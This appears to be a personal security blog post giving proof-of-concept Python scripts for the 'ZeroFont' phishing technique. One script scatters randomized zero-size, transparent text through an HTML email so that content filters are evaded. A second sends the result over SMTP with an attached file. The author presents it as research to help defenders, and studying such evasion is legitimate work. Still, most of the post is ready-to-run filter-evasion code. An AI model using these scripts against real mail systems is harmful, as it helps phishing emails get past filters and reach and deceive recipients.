Sunday, September 30, 2018

ZeroFont Vulnerability Testing and PoC - Updated

Recently a friend of mine published an article called "The ZeroFont Exploit Continues".  He referenced a link at the following location, "http://www.avanan.com/resources/zerofont-phishing-attack".  From this research I was testing to see if I could send an email that is similar to myself.  Though I did not formulate a phishing email I used the above tactics to send a message and it went through.

Below are the scripts that I used to test how "The ZeroFont Exploit Continues"...




#!/usr/bin/python

# Allow the first 50 characters of the message to not have zero fonts.
# Allow for if a link is found within the message to keep the link in tact.

import random

alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
messageSpacing = 50 # How many characters from the beginning to not encode
newMessage = ''
f = open('message.txt', 'r')
for line in f:
    letterCount = 0
    counter = random.randint(1,4)
    htmlChar = False
    for letter in line.replace('\n',''):
        newMessage += letter
        if letter == '<':
            htmlChar = True
            letterCount += 1
            messageSpacing -= 1
        elif letter == '>':
            htmlChar = False
            letterCount += 1
            messageSpacing -= 1
        elif htmlChar == False:
            if messageSpacing > 0:
                messageSpacing -= 1
            elif letterCount >= counter:
                letterCount = 0
                counter = random.randint(1,4)
            elif letterCount == 1:
                randStr = ''
                for i in range(0,random.randint(3,12)):
                    randStr += alphabet[random.randint(0,61)]
                #newMessage += '<span style="FONT-SIZE: 0px">' + randStr + '</span>'
                newMessage += '<span style="font-size:0px;color:transparent">' + randStr + '</span>'
                letterCount += 1
            else:
                letterCount += 1
    newMessage += '<br />'


print "<html><body>"
print newMessage
print "</body></html>"

---
Script to send the Email
---

#!/usr/bin/python

import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders

msg = MIMEMultipart('alternative')
msg['Subject'] = "ZeroFont Exploit"
msg['From'] = "from_email"
msg['To'] = "to_email"

# Attach the HTML Message
htmlMsg = ''
f = open('t', 'r')
for line in f:
    htmlMsg += line.strip()
htmlPart = MIMEText(htmlMsg, 'html')
msg.attach(htmlPart)

# Attach an Attachment
f = open('script', 'rb')
filePart = MIMEBase('application', 'octet-stream')
filePart.set_payload((f).read())
encoders.encode_base64(filePart)
filePart.add_header('Content-Disposition', "attachment; filename=script")
msg.attach(filePart)

fromAddress='from_email'
toAddress='to_email'

username='username'
password='password'

server = smtplib.SMTP('smtp.server.com:1527')
server.starttls()
server.login(username, password)
server.sendmail(fromAddress, toAddress, msg.as_string())
server.quit()

These scripts are meant to assist in security researchers thwarting this vulnerability that phishing emails are exploiting in email filters.
at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...